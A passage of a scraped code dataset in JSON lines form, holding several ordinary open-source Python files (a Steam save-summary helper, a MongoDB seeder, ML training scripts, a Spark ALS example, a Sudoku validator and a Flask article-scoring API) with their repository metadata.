"line_number": 22, "usage_type": "call"}, {"api_name": "numba.jit", "line_number": 26, "usage_type": "call"}, {"api_name": "numpy.ceil", "line_number": 34, "usage_type": "call"}, {"api_name": "numpy.tile", "line_number": 35, "usage_type": "call"}, {"api_name": "numpy.arange", "line_number": 35, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 36, "usage_type": "call"}, {"api_name": "numpy.int32", "line_number": 36, "usage_type": "attribute"}, {"api_name": "torch.median", "line_number": 45, "usage_type": "call"}, {"api_name": "torch.abs", "line_number": 45, "usage_type": "call"}, {"api_name": "torch.jit", "line_number": 42, "usage_type": "attribute"}, {"api_name": "torch.searchsorted", "line_number": 55, "usage_type": "call"}, {"api_name": "torch.abs", "line_number": 59, "usage_type": "call"}, {"api_name": "torch.jit", "line_number": 47, "usage_type": "attribute"}, {"api_name": "numpy.zeros", "line_number": 69, "usage_type": "call"}, {"api_name": "numba.prange", "line_number": 74, "usage_type": "call"}, {"api_name": "numba.prange", "line_number": 75, "usage_type": "call"}, {"api_name": "numba.jit", "line_number": 72, "usage_type": "call"}]}
+{"seq_id": "41733890021", "text": "from . import err\nfrom .err import err_enum\nfrom enum import IntEnum\nimport datetime\nfrom zoneinfo import ZoneInfo\n\ng_truncate_max = 1000\n\n'''\n[\n {\n 'name': game_name0\n 'files': [\n {\n 'filename': file_name0,\n 'old_time': time_str\n 'new_time': time_str\n },\n {\n 'filename': file_name1,\n 'old_time': time_str\n 'new_time': time_str\n },\n ...\n ]\n },\n {\n ...\n },\n]\n'''\n\nclass level_e(IntEnum):\n NONE = 0\n GAME = 1\n FILE = 2\n TIME = 3\n\nclass summary:\n def __init__(self, level:int):\n self.data = list()\n self.level = level\n # Steam timezone is in PST\n self.local_tz = datetime.datetime.now().astimezone().tzinfo\n self.server_tz = ZoneInfo(\"America/Los_Angeles\")\n\n def add_game(self, game_name:str):\n if len(self.data) != 0 and self.data[-1]['name'] == game_name:\n return\n self.data.append({'name': game_name, 'files': list()})\n\n def add_game_file(\n self,\n game_name:str,\n file_name:str,\n timestamp_old,\n timestamp_new:str):\n\n if self.data[-1]['name'] != game_name:\n return\n\n def to_string(time):\n if time is None:\n return None\n\n target_time = time.replace(tzinfo=self.server_tz).astimezone(self.local_tz).replace(tzinfo=None)\n\n now = datetime.datetime.now()\n\n if target_time.year == now.year:\n return target_time.strftime(\"%m-%d %H:%M\")\n else:\n return target_time.isoformat(' ', 'minutes')\n\n self.data[-1]['files'].append(\n {\n 'filename': file_name,\n 'old_time': to_string(timestamp_old),\n 'new_time': to_string(timestamp_new)\n })\n\n\n def has_changes(self):\n return len(self.data) != 0\n\n def get(self):\n if len(self.data) == 0:\n return None\n if self.level == level_e.NONE:\n return None\n text = \"Execute summary:\\n\"\n\n for game in self.data:\n text += f\"- {game['name']}\\n\"\n\n if (len(text) > g_truncate_max):\n text += \"Truncated...\\n\"\n return text\n\n if self.level < level_e.FILE:\n continue\n\n for file in game['files']:\n text += f\" - {file['filename']}\"\n\n if (len(text) > g_truncate_max):\n text += \"\\nTruncated...\\n\"\n return text\n\n if self.level < level_e.TIME:\n text += \"\\n\"\n continue\n if file['old_time']:\n text += f\" ({file['old_time']} -> {file['new_time']})\\n\"\n else:\n text += f\" (new {file['new_time']})\\n\"\n\n return text\n", "repo_name": "pyscsd/steamCloudSaveDownloader", "sub_path": "steamCloudSaveDownloader/summary.py", "file_name": "summary.py", "file_ext": "py", "file_size_in_byte": 2983, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 1, "dataset": "github-code", "pt": "32", "api": [{"api_name": "enum.IntEnum", "line_number": 33, "usage_type": "name"}, {"api_name": "datetime.datetime.now", "line_number": 44, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 44, "usage_type": "attribute"}, {"api_name": "zoneinfo.ZoneInfo", "line_number": 45, "usage_type": "call"}, {"api_name": "datetime.datetime.now", "line_number": 68, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 68, "usage_type": "attribute"}]}
+{"seq_id": "28035186074", "text": "from config.models import Author , Quote\nfrom mongoengine.errors import NotUniqueError\nfrom config.db import mongoconect\nimport json\nfrom pathlib import Path\n\n#path = Path('python_web16_hw9' / 'python_web16_hw9' / 'spiders') / 'python_web16_hw9' / 'python_web16_hw9' / 'spiders'/)\n\n\nauthor_data = 'python_web16_hw9/python_web16_hw9/spiders/authors.json'\nquote_data = 'python_web16_hw9/python_web16_hw9/spiders/quotes.json'\n\ndef data_load(data):\n with open(data, encoding='utf-8') as fd:\n data_json = json.load(fd)\n return(data_json)\n\n\ndef qoute(data_q):\n for el in data_load(data_q):\n try:\n author, *_ = Author.objects(fullname=el.get('author'))\n quote = Quote(quote=el.get('quote'), tags=el.get('tags'), author=author)\n quote.save()\n except ValueError:\n print(\"Автора не існує в таблиці авторів\")\n\ndef author(data_a):\n for el in data_load(data_a):\n try:\n author = Author(fullname=el.get('fullname'), born_date=el.get('born_date'),\n born_location=el.get('born_location'), description=el.get('description'))\n author.save()\n except NotUniqueError:\n print(f\"Автор вже існує {el.get('fullname')}\")\n\nif __name__ == \"__main__\":\n mongoconect()\n author(author_data)\n qoute(quote_data)\n", "repo_name": "MSRoma/python_web_hw9", "sub_path": "seed.py", "file_name": "seed.py", "file_ext": "py", "file_size_in_byte": 1426, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "32", "api": [{"api_name": "json.load", "line_number": 15, "usage_type": "call"}, {"api_name": "config.models.Author.objects", "line_number": 22, "usage_type": "call"}, {"api_name": "config.models.Author", "line_number": 22, "usage_type": "name"}, {"api_name": "config.models.Quote", "line_number": 23, "usage_type": "call"}, {"api_name": "config.models.Author", "line_number": 31, "usage_type": "call"}, {"api_name": "mongoengine.errors.NotUniqueError", "line_number": 34, "usage_type": "name"}, {"api_name": "config.db.mongoconect", "line_number": 38, "usage_type": "call"}]}
+{"seq_id": "71311786972", "text": "import tensorflow as tf \nfrom hyperparams import Hyperparams\nfrom data_loader import Train_data_loader, Val_data_loader, Test_data_loader\nfrom model import Model\nimport logging, pandas\nimport numpy as np\n\n#logger configuration\nFORMAT = \"[%(filename)s: %(lineno)3s] %(levelname)s: %(message)s\"\nlogging.basicConfig(level=logging.INFO, format=FORMAT)\nlogger = logging.getLogger(__name__)\n\nH = Hyperparams()\n\ntrain_batch_generator = Train_data_loader(H.train_batch_size, H.num_train)\nval_batch_generator = Val_data_loader(H.val_batch_size, H.num_train)\ntest_batch_generator = Test_data_loader(H.test_batch_size)\nlogger.info(\"Generators instantiated\")\n\nmodel = Model().get_model()\nlogger.info(\"Model loaded\")\n\nadam = tf.keras.optimizers.Adam(lr=H.learning_rate)\nmodel.compile(optimizer=adam, loss='mean_squared_error')\nlogger.info(\"Model compiled\")\n\nbaseline_loss = H.baseline\nlogger.info(\"Beginning training\")\nnum_batch = H.num_train//H.train_batch_size\nshuffled_batch = np.array([np.random.choice(num_batch, size=(num_batch), replace=False) for _ in range(H.num_epochs)])\nloss = np.zeros(shape=(num_batch))\nfor epoch in range(H.num_epochs):\n\tfor batch_idx in shuffled_batch[epoch]:\n\t\timg_batch, labels_batch = train_batch_generator[batch_idx]\n\t\tloss[batch_idx] = model.train_on_batch(img_batch, labels_batch, class_weight={0:H.x1, 1:H.x2_x1, 2:H.y1, 3:H.y2_y1})\n\t\tlogger.info(\"Epoch : {}, Step : {}, Loss : {}\".format(epoch, batch_idx, loss[batch_idx]))\n\t\tif loss[batch_idx] < baseline_loss:\n\t\t\tmodel.save_weights(\"saved_weights/model_{}.h5\".format(np.rint(loss[batch_idx])))\n\t\t\tbaseline_loss = loss[batch_idx]\n\t\t\tlogger.info(\"New best selected - {}\".format(loss))\n\tmodel.save_weights(\"saved_weights/model_epoch_{}.h5\".format(epoch))\n\tlogger.info(\"Model weights - model_epoch_{} saved\".format(epoch))\n\tval_loss = model.evaluate_generator(generator=val_batch_generator, steps=H.num_val//H.val_batch_size, \n\t\tmax_queue_size=3, use_multiprocessing=False, verbose=2)\n\tavg_train_loss = np.mean(loss)\n\tlogger.info(\"Avg Train Loss for Epoch : {} is {}\".format(epoch, avg_train_loss))\n\tlogger.info(\"Validation - Epoch : {}, Val_Loss : {}\".format(epoch, val_loss))\n", "repo_name": "yashjakhotiya/Flipkart-GRiD-Challenge-2019", "sub_path": "train.py", "file_name": "train.py", "file_ext": "py", "file_size_in_byte": 2153, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 1, "dataset": "github-code", "pt": "32", "api": [{"api_name": "logging.basicConfig", "line_number": 10, "usage_type": "call"}, {"api_name": "logging.INFO", "line_number": 10, "usage_type": "attribute"}, {"api_name": "logging.getLogger", "line_number": 11, "usage_type": "call"}, {"api_name": "hyperparams.Hyperparams", "line_number": 13, "usage_type": "call"}, {"api_name": "data_loader.Train_data_loader", "line_number": 15, "usage_type": "call"}, {"api_name": "data_loader.Val_data_loader", "line_number": 16, "usage_type": "call"}, {"api_name": "data_loader.Test_data_loader", "line_number": 17, "usage_type": "call"}, {"api_name": "model.Model", "line_number": 20, "usage_type": "call"}, {"api_name": "tensorflow.keras.optimizers.Adam", "line_number": 23, "usage_type": "call"}, {"api_name": "tensorflow.keras", "line_number": 23, "usage_type": "attribute"}, {"api_name": "model.compile", "line_number": 24, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 30, "usage_type": "call"}, {"api_name": "numpy.random.choice", "line_number": 30, "usage_type": "call"}, {"api_name": "numpy.random", "line_number": 30, "usage_type": "attribute"}, {"api_name": "numpy.zeros", "line_number": 31, "usage_type": "call"}, {"api_name": "model.train_on_batch", "line_number": 35, "usage_type": "call"}, {"api_name": "model.save_weights", "line_number": 38, "usage_type": "call"}, {"api_name": "numpy.rint", "line_number": 38, "usage_type": "call"}, {"api_name": "model.save_weights", "line_number": 41, "usage_type": "call"}, {"api_name": "model.evaluate_generator", "line_number": 43, "usage_type": "call"}, {"api_name": "numpy.mean", "line_number": 45, "usage_type": "call"}]}
+{"seq_id": "17063660694", "text": "import os\nfrom PIL import Image\n\n# Changing the working path\npath = input(\"input working path : \") + '/'\nos.chdir(path)\nos.getcwd()\n\n# image size conversion\nthumb = input(\"input thumb name : \")\nif thumb in os.listdir(path) :\n image = Image.open(thumb)\n\n placehold_image = image.resize((230, 129))\n thumb_image = image.resize((535, 301))\n thumb2x_image = image.resize((1070, 602))\n\n filename, fileExtension = os.path.splitext(thumb)\n\n if fileExtension == '.jpg':\n placehold_image.save(path + thumb + '_placehold.jpg', quality=95)\n thumb_image.save(path + thumb + '_thumb.jpg', quality=95)\n thumb2x_image.save(path + thumb + '_thumb@2x.jpg', quality=95)\n else:\n placehold_image.convert(\"RGB\").save(path + thumb + '_placehold.jpg')\n thumb_image.convert(\"RGB\").save(path + thumb + '_thumb.jpg')\n thumb2x_image.convert(\"RGB\").save(path + thumb + '_thumb@2x.jpg')\n\nelse :\n print('Wrong Thumbnail name. Please check')\n\n", "repo_name": "jihunparkme/this-and-that-py", "sub_path": "make_gitblog_thumbnail.py", "file_name": "make_gitblog_thumbnail.py", "file_ext": "py", "file_size_in_byte": 978, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "32", "api": [{"api_name": "os.chdir", "line_number": 6, "usage_type": "call"}, {"api_name": "os.getcwd", "line_number": 7, "usage_type": "call"}, {"api_name": "os.listdir", "line_number": 11, "usage_type": "call"}, {"api_name": "PIL.Image.open", "line_number": 12, "usage_type": "call"}, {"api_name": "PIL.Image", "line_number": 12, "usage_type": "name"}, {"api_name": "os.path.splitext", "line_number": 18, "usage_type": "call"}, {"api_name": "os.path", "line_number": 18, "usage_type": "attribute"}]}
+{"seq_id": "39617438276", "text": "import h5py\nimport matplotlib.pyplot as plt\nfrom sklearn.neural_network import MLPRegressor\nfrom sklearn.datasets import make_regression\nfrom sklearn.model_selection import train_test_split\nfrom sklearn.preprocessing import StandardScaler # doctest: +SKIP\nfrom sklearn.decomposition import PCA\nfrom sklearn.neural_network import MLPClassifier\nfrom sklearn.model_selection import train_test_split\nimport numpy as np\nimport scipy as sp\nfname = \"C:/Users/AlessioB/Desktop/REFTEP ANN/sub-1_band-mu_iplv.mat\"\nmat1 = h5py.File(fname)\nfname = \"C:/Users/AlessioB/Desktop/REFTEP ANN/sub-1_band-betalow_iplv.mat\"\nmat2 = h5py.File(fname)\nfname = \"C:/Users/AlessioB/Desktop/REFTEP ANN/sub-1_band-betahigh_iplv.mat\"\nmat3 = h5py.File(fname)\n\n\nX = np.hstack((mat1['iPLV'].value[:,::20],\n mat2['iPLV'].value[:,::20],\n mat3['iPLV'].value[:,::20]))\n\nY = mat1['AmpsMclean'].value\n\nY=np.log(Y.T)\n#Y=sp.stats.zscore(Y)\n#plt.hist(Y)\n\nY=Y[:,0]\nthreshold=np.median(Y)\nY[Y=threshold]=1\n\nX=X[:,np.std(X,0)>0]\nX=np.log(np.abs(X)/(1-np.abs(X)))\n#X=sp.stats.zscore(X)\n\n#pca = PCA(n_components=2)\n#pca.fit(X.T)\n#Xred=pca.components_.T\n#Xred=sp.stats.zscore(Xred)\n\n\n#vectvox=np.random.randint(0,X.shape[1],100)\n#vectvox=np.random.permutation(100)\n#Xred=X[:,vectvox_app_fewer[vectvox[1:50]]]\n\nXred=X \nNVox=Xred.shape[1]\nSizeLayer=int(NVox/10)\nres=np.zeros(100)\nfor iiter in range(100):\n X_train, X_test, y_train, y_test = train_test_split(Xred, Y, train_size=0.75)\n scaler = StandardScaler() # doctest: +SKIP\n scaler.fit(X_train) # doctest: +SKIP\n X_train = scaler.transform(X_train) # doctest: +SKIP\n X_test = scaler.transform(X_test) # doctest: +SKIP\n clf = MLPClassifier(hidden_layer_sizes=(SizeLayer), activation='relu', max_iter=500).fit(X_train, y_train)\n res[iiter]=clf.score(X_test, y_test)\n\n\nplt.hist(res)\nplt.show()", "repo_name": "robbisg/mvpa_itab_wu", "sub_path": "scripts/mambo/reftep/mlp.py", "file_name": "mlp.py", "file_ext": "py", "file_size_in_byte": 1868, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 1, "dataset": "github-code", "pt": "32", "api": [{"api_name": "h5py.File", "line_number": 13, "usage_type": "call"}, {"api_name": "h5py.File", "line_number": 15, "usage_type": "call"}, {"api_name": "h5py.File", "line_number": 17, "usage_type": "call"}, {"api_name": "numpy.hstack", "line_number": 20, "usage_type": "call"}, {"api_name": "numpy.log", "line_number": 26, "usage_type": "call"}, {"api_name": "numpy.median", "line_number": 31, "usage_type": "call"}, {"api_name": "numpy.std", "line_number": 35, "usage_type": "call"}, {"api_name": "numpy.log", "line_number": 36, "usage_type": "call"}, {"api_name": "numpy.abs", "line_number": 36, "usage_type": "call"}, {"api_name": "numpy.zeros", "line_number": 52, "usage_type": "call"}, {"api_name": "sklearn.model_selection.train_test_split", "line_number": 54, "usage_type": "call"}, {"api_name": "sklearn.preprocessing.StandardScaler", "line_number": 55, "usage_type": "call"}, {"api_name": "sklearn.neural_network.MLPClassifier", "line_number": 59, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.hist", "line_number": 63, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 63, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.show", "line_number": 64, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 64, "usage_type": "name"}]}
+{"seq_id": "28478019147", "text": "from __future__ import print_function\n\nimport sys\n\nimport numpy as np\nfrom numpy.random import rand\nfrom numpy import matrix\nfrom pyspark.sql import SparkSession\n\nLAMBDA = 0.01 # regularization\nnp.random.seed(42)\n\n\ndef rmse(R, ms, us):\n diff = R - ms * us.T\n return np.sqrt(np.sum(np.power(diff, 2)) / (M * U))\n\n\ndef update(i, mat, ratings):\n uu = mat.shape[0]\n ff = mat.shape[1]\n\n XtX = mat.T * mat\n Xty = mat.T * ratings[i, :].T\n\n for j in range(ff):\n XtX[j, j] += LAMBDA * uu\n\n return np.linalg.solve(XtX, Xty)\n\n\nif __name__ == \"__main__\":\n\n \"\"\"\n Usage: als [M] [U] [F] [iterations] [partitions]\"\n \"\"\"\n\n print(\"\"\"WARN: This is a naive implementation of ALS and is given as an\n example. Please use pyspark.ml.recommendation.ALS for more\n conventional use.\"\"\", file=sys.stderr)\n\n spark = SparkSession\\\n .builder\\\n .appName(\"PythonALS\")\\\n .getOrCreate()\n\n sc = spark.sparkContext\n\n M = int(sys.argv[1]) if len(sys.argv) > 1 else 100\n U = int(sys.argv[2]) if len(sys.argv) > 2 else 500\n F = int(sys.argv[3]) if len(sys.argv) > 3 else 10\n ITERATIONS = int(sys.argv[4]) if len(sys.argv) > 4 else 5\n partitions = int(sys.argv[5]) if len(sys.argv) > 5 else 2\n\n print(\"Running ALS with M=%d, U=%d, F=%d, iters=%d, partitions=%d\\n\" %\n (M, U, F, ITERATIONS, partitions))\n\n R = matrix(rand(M, F)) * matrix(rand(U, F).T)\n ms = matrix(rand(M, F))\n us = matrix(rand(U, F))\n\n Rb = sc.broadcast(R)\n msb = sc.broadcast(ms)\n usb = sc.broadcast(us)\n\n for i in range(ITERATIONS):\n ms = sc.parallelize(range(M), partitions) \\\n .map(lambda x: update(x, usb.value, Rb.value)) \\\n .collect()\n # collect() returns a list, so array ends up being\n # a 3-d array, we take the first 2 dims for the matrix\n ms = matrix(np.array(ms)[:, :, 0])\n msb = sc.broadcast(ms)\n\n us = sc.parallelize(range(U), partitions) \\\n .map(lambda x: update(x, msb.value, Rb.value.T)) \\\n .collect()\n us = matrix(np.array(us)[:, :, 0])\n usb = sc.broadcast(us)\n\n error = rmse(R, ms, us)\n print(\"Iteration %d:\" % i)\n print(\"\\nRMSE: %5.4f\\n\" % error)\n\n spark.stop()\n", "repo_name": "data-science-on-aws/data-science-on-aws", "sub_path": "06_prepare/archive/spark/spark-2.4.6-bin-without-hadoop/examples/src/main/python/als.py", "file_name": "als.py", "file_ext": "py", "file_size_in_byte": 2276, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 3220, "dataset": "github-code", "pt": "31", "api": [{"api_name": "numpy.random.seed", "line_number": 11, "usage_type": "call"}, {"api_name": "numpy.random", "line_number": 11, "usage_type": "attribute"}, {"api_name": "numpy.sqrt", "line_number": 16, "usage_type": "call"}, {"api_name": "numpy.sum", "line_number": 16, "usage_type": "call"}, {"api_name": "numpy.power", "line_number": 16, "usage_type": "call"}, {"api_name": "numpy.linalg.solve", "line_number": 29, "usage_type": "call"}, {"api_name": "numpy.linalg", "line_number": 29, "usage_type": "attribute"}, {"api_name": "sys.stderr", "line_number": 40, "usage_type": "attribute"}, {"api_name": "pyspark.sql.SparkSession.builder.appName", "line_number": 42, "usage_type": "call"}, {"api_name": "pyspark.sql.SparkSession.builder", "line_number": 42, "usage_type": "attribute"}, {"api_name": "pyspark.sql.SparkSession", "line_number": 42, "usage_type": "name"}, {"api_name": "sys.argv", "line_number": 49, "usage_type": "attribute"}, {"api_name": "sys.argv", "line_number": 50, "usage_type": "attribute"}, {"api_name": "sys.argv", "line_number": 51, "usage_type": "attribute"}, {"api_name": "sys.argv", "line_number": 52, "usage_type": "attribute"}, {"api_name": "sys.argv", "line_number": 53, "usage_type": "attribute"}, {"api_name": "numpy.matrix", "line_number": 58, "usage_type": "call"}, {"api_name": "numpy.random.rand", "line_number": 58, "usage_type": "call"}, {"api_name": "numpy.matrix", "line_number": 59, "usage_type": "call"}, {"api_name": "numpy.random.rand", "line_number": 59, "usage_type": "call"}, {"api_name": "numpy.matrix", "line_number": 60, "usage_type": "call"}, {"api_name": "numpy.random.rand", "line_number": 60, "usage_type": "call"}, {"api_name": "numpy.matrix", "line_number": 72, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 72, "usage_type": "call"}, {"api_name": "numpy.matrix", "line_number": 78, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 78, "usage_type": "call"}]}
+{"seq_id": "27410904232", "text": "#\n# @lc app=leetcode id=36 lang=python3\n#\n# [36] Valid Sudoku\n#\nfrom typing import List\n\n# @lc code=start\nimport math\nfrom collections import defaultdict\n\n\nclass Solution:\n def isValidSudoku(self, board: List[List[str]]) -> bool:\n rows = defaultdict(set)\n columns = defaultdict(set)\n boxes = defaultdict(set)\n\n for r, row in enumerate(board):\n for c, value in enumerate(row):\n if value == \".\":\n continue\n\n value = int(value)\n b = math.floor(c / 3) + math.floor(r / 3) * 3\n\n if value in rows[r] or value in columns[c] or value in boxes[b]:\n return False\n\n rows[r].add(value)\n columns[c].add(value)\n boxes[b].add(value)\n\n return True\n\n\n# @lc code=end\n\nboard = [\n [\"5\", \"3\", \".\", \".\", \"7\", \".\", \".\", \".\", \".\"],\n [\"6\", \".\", \".\", \"1\", \"9\", \"5\", \".\", \".\", \".\"],\n [\".\", \"9\", \"8\", \".\", \".\", \".\", \".\", \"6\", \".\"],\n [\"8\", \".\", \".\", \".\", \"6\", \".\", \".\", \".\", \"3\"],\n [\"4\", \".\", \".\", \"8\", \".\", \"3\", \".\", \".\", \"1\"],\n [\"7\", \".\", \".\", \".\", \"2\", \".\", \".\", \".\", \"6\"],\n [\".\", \"6\", \".\", \".\", \".\", \".\", \"2\", \"8\", \".\"],\n [\".\", \".\", \".\", \"4\", \"1\", \"9\", \".\", \".\", \"5\"],\n [\".\", \".\", \".\", \".\", \"8\", \".\", \".\", \"7\", \"9\"],\n]\n\ns = Solution()\nprint(s.isValidSudoku(board))\n", "repo_name": "brxck/leetcode", "sub_path": "36.valid-sudoku.py", "file_name": "36.valid-sudoku.py", "file_ext": "py", "file_size_in_byte": 1359, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "32", "api": [{"api_name": "typing.List", "line_number": 14, "usage_type": "name"}, {"api_name": "collections.defaultdict", "line_number": 15, "usage_type": "call"}, {"api_name": "collections.defaultdict", "line_number": 16, "usage_type": "call"}, {"api_name": "collections.defaultdict", "line_number": 17, "usage_type": "call"}, {"api_name": "math.floor", "line_number": 25, "usage_type": "call"}]}
+{"seq_id": "41446162322", "text": "import flask\nfrom flask import request, jsonify\nimport pandas as pd\nimport numpy as np\nfrom textblob import TextBlob\nfrom collections import Counter\nimport sys\nimport nltk\nimport requests\nfrom bs4 import BeautifulSoup\nfrom sklearn.linear_model import LinearRegression\nfrom sklearn.model_selection import train_test_split\nfrom nltk.corpus import stopwords\nimport operator\nfrom summa import keywords\nfrom summa.summarizer import summarize\nfrom datetime import datetime, timedelta\nfrom flask_cors import CORS\n\n\ndef readwords( filename ):\n f = open(filename,encoding=\"ISO-8859-1\")\n words = [ line.rstrip() for line in f.readlines()]\n return words\n\npositive = readwords('positive.txt')\nnegative = readwords('negative.txt')\n\n\n\ntdf = pd.read_csv(\"OnlineNewsPopularity.csv\")\npdf = tdf[[' timedelta', ' n_tokens_title', ' n_tokens_content',' num_imgs',' num_videos',' num_hrefs',' global_subjectivity',' global_sentiment_polarity',' global_rate_positive_words',' global_rate_negative_words',' title_subjectivity',' title_sentiment_polarity',' shares']].copy()\nX = pdf.drop([' shares',' timedelta'],axis=1)\ny = pdf[' shares']\nlm = LinearRegression()\nX_train, X_test, y_train, y_test = train_test_split( X, y, test_size=0.33, random_state=42)\nlm.fit(X_train,y_train)\n\n\n\n\napp = flask.Flask(__name__)\nCORS(app)\napp.config[\"DEBUG\"] = True\n\ndef structural_analysis(title,text,image_count,video_count,link_count):\n\ttext = text.lower()\n\ttitle = title.lower()\n\ttokens_title = nltk.word_tokenize(title)\n\ttokens_content = nltk.word_tokenize(text)\n\tn_tokens_title = len(tokens_title)\n\tn_tokens_content = len(tokens_content)\n\tglobal_subjectivity = TextBlob(text).sentiment[1]\n\tglobal_sentiment_polarity = TextBlob(text).sentiment[0]\n\ttitle_subjectivity = TextBlob(title).sentiment[1]\n\ttitle_sentiment_polarity = TextBlob(title).sentiment[0]\n\tpos = 0\n\tneg = 0\n\tfor key in tokens_content:\n\t\tkey = key.rstrip('.,?!\\n')\n\t\tif key in positive:\n\t\t\tpos += 1\n\t\tif key in negative:\n\t\t\tneg += 1\n\tglobal_rate_positive_words = pos/n_tokens_content\n\tglobal_rate_negative_words = pos/n_tokens_content\n\tnum_imgs = image_count\n\tnum_videos = video_count\n\tnum_hrefs = link_count\n\td = {' n_tokens_title':n_tokens_title, ' n_tokens_content':n_tokens_content, ' num_imgs':num_imgs, ' num_videos':num_videos,' num_hrefs':num_hrefs, ' global_subjectivity':global_subjectivity, ' global_sentiment_polarity':global_sentiment_polarity,' global_rate_positive_words':global_rate_positive_words, ' global_rate_negative_words':global_rate_negative_words,' title_subjectivity':title_subjectivity, ' title_sentiment_polarity':title_sentiment_polarity}\n\tldf = pd.DataFrame(data=d,index=[0])\n\treturn(lm.predict(ldf))\n\ndef trendanalysis(title,text,city):\n\tnew_trends = []\n\tfor i in range(0,5):\n\t\tdate_N_days_ago = datetime.now() - timedelta(days=i)\n\t\tnew_date = str(date_N_days_ago.year)+\"-\"+str(date_N_days_ago.month)+\"-\"+str(date_N_days_ago.day)\n\n\t\tpage = requests.get(\"https://trendogate.com/placebydate/\"+city+\"/\"+new_date)\n\t\tsoup = BeautifulSoup(page.content, 'html.parser')\n\t\ttrends = soup.find_all('li', attrs = {'class':'list-group-item'})\n\t\tfor i in range(len(trends)):\n\t\t\tif ((((str(trends[i]).split())[-1]).split('<'))[0]) not in new_trends:\n\t\t\t\tnew_trends.append(((((str(trends[i]).split())[-1]).split('<'))[0]))\n\n\tnew_trends = new_trends[0:40]\n\twordlist = []\n\tfor i in new_trends:\n\t\tif(i=='#'):\n\t\t\tcontinue\n\t\t\n\t\tif(i[0]=='#'):\n\t\t\twordlist.append(i[1:])\n\t\telse:\n\t\t\twordlist.append(i)\n\tprint(wordlist)\n\ttext = text.lower()\n\ttokens = [t for t in text.split()]\n\tclean_tokens = tokens[:]\n\tsr = stopwords.words('english')\n\tfor token in tokens:\n\t if token in stopwords.words('english'):\n\t clean_tokens.remove(token)\n\t freq = nltk.FreqDist(clean_tokens)\n\t sorted_list = sorted(\n\t freq.items(), key=operator.itemgetter(1), reverse=True)\n\tlist = []\n\tfor listitem in sorted_list:\n\t list.append(listitem[0])\n\ttaglist = nltk.tag.pos_tag(list)\n\tfinallist = []\n\tfinallist.append(taglist[0][0])\n\tfinallist.append(taglist[1][0])\n\tfinallist.append(taglist[2][0])\n\ti=2\n\twhile i11:\n\t\t\t\tbreak\n\t\t\t\n\t\t\tif i[1]=='NN' or i[1]=='NNS':\n\t\t\t\tif i[0] not in finallist:\n\t\t\t\t\tfinallist.append(i[0])\n\ttemps = summarize(text, ratio=0.1)\n\tif temps:\n\t\tanother_temp = keywords.keywords(temps).split('\\n')\n\t\tfor i in nltk.pos_tag(another_temp):\n\t\t\tif len(finallist)>15:\n\t\t\t\tbreak\n\n\t\t\tif i[0] not in finallist and (i[1]=='NN' or i[1]=='NNS'):\n\t\t\t\tfinallist.append(i[0])\n\n \n\tscore = 0\n\tfor i in finallist:\n\t\tfor j in wordlist:\n\t\t\tif nltk.edit_distance(i,j) <=2:\n\t\t\t\tscore = score+1\n\ttokens_title = nltk.word_tokenize(title)\n\tfor i in tokens_title:\n\t\tfor j in wordlist:\n\t\t\tif nltk.edit_distance(i,j) <=2:\n\t\t\t\tscore = score+1\n\tprint(score)\n\treturn(score)\n\n@app.route('/',methods=['GET','POST'])\n\ndef home():\n\tjson_data = request.get_json()\n\ttitle = json_data[\"title\"]\n\ttext = json_data[\"text\"]\n\timage_count = json_data[\"image_count\"]\n\tvideo_count = json_data[\"video_count\"]\n\tlink_count = json_data[\"link_count\"]\n\tcity_c = json_data[\"location\"]\n\tstructural_a = structural_analysis(title,text,image_count,video_count,link_count)\n\ttrend_a = trendanalysis(title,text,city_c)\n\tresult = []\n\tresult.append(trend_a)\n\tresult.append(structural_a)\n\tprint(\"API called\")\n\treturn(jsonify({\"structural_a\":structural_a[0],\"trend_a\":trend_a}))\n\nif __name__ == \"__main__\":\n app.run(host='0.0.0.0',port='5000')\n", "repo_name": "hridyansh68/App_Rate_US", "sub_path": "app.py", "file_name": "app.py", "file_ext": "py", "file_size_in_byte": 5614, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 1, "dataset": "github-code", "pt": "32", "api": [{"api_name": "pandas.read_csv", "line_number": 31, "usage_type": "call"}, {"api_name": "sklearn.linear_model.LinearRegression", "line_number": 35, "usage_type": "call"}, {"api_name": "sklearn.model_selection.train_test_split", "line_number": 36, "usage_type": "call"}, {"api_name": "flask.Flask", "line_number": 42, "usage_type": "call"}, {"api_name": "flask_cors.CORS", "line_number": 43, "usage_type": "call"}, {"api_name": "nltk.word_tokenize", "line_number": 49, "usage_type": "call"}, {"api_name": "nltk.word_tokenize", "line_number": 50, "usage_type": "call"}, {"api_name": "textblob.TextBlob", "line_number": 53, "usage_type": "call"}, {"api_name": "textblob.TextBlob", "line_number": 54, "usage_type": "call"}, {"api_name": "textblob.TextBlob", "line_number": 55, "usage_type": "call"}, {"api_name": "textblob.TextBlob", "line_number": 56, "usage_type": "call"}, {"api_name": "pandas.DataFrame", "line_number": 71, "usage_type": "call"}, {"api_name": "datetime.datetime.now", "line_number": 77, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 77, "usage_type": "name"}, {"api_name": "datetime.timedelta", "line_number": 77, "usage_type": "call"}, {"api_name": "requests.get", "line_number": 80, "usage_type": "call"}, {"api_name": "bs4.BeautifulSoup", "line_number": 81, "usage_type": "call"}, {"api_name": "nltk.corpus.stopwords.words", "line_number": 101, "usage_type": "call"}, {"api_name": "nltk.corpus.stopwords", "line_number": 101, "usage_type": "name"}, {"api_name": "nltk.corpus.stopwords.words", "line_number": 103, "usage_type": "call"}, {"api_name": "nltk.corpus.stopwords", 